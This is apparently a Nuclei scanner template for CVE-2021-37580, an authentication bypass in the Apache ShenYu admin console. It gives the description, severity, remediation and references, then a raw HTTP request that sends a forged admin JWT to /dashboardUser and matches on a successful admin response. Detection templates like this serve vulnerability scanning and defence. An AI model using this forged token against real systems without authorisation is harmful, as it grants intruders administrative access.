Description
Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication.
Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication.
id: CVE-2021-37580
info:
name: Apache ShenYu Admin JWT - Authentication Bypass
author: pdteam
severity: critical
description: Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication.
impact: |
This vulnerability can lead to unauthorized access to sensitive information, modification of data, and potential compromise of the entire Apache ShenYu system.
remediation: |
Apply the patch or upgrade to the latest version of Apache ShenYu to fix the authentication bypass vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-37580
- https://github.com/fengwenhua/CVE-2021-37580
- https://lists.apache.org/thread/o15j25qwtpcw62k48xw1tnv48skh3zgb
- http://www.openwall.com/lists/oss-security/2021/11/16/1
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-37580
cwe-id: CWE-287
epss-score: 0.41851
epss-percentile: 0.98616
cpe: cpe:2.3:a:apache:shenyu:2.3.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: shenyu
tags: cve2021,cve,apache,jwt,shenyu,vkev,vuln
http:
- raw:
- |
GET /dashboardUser HTTP/1.1
Host: {{Hostname}}
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk
matchers-condition: and
matchers:
- type: word
words:
- 'query success'
- '"userName":"admin"'
- '"code":200'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100e58c6ce8f8d74c6dce5946009c7322e27d5803225b010ae3cb5c7f5b4f67021f022100fd8b9d0585554771ba5bb4fc32317ccb3f3eb4567ac9bfbfbaf1a1ad280f388a:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.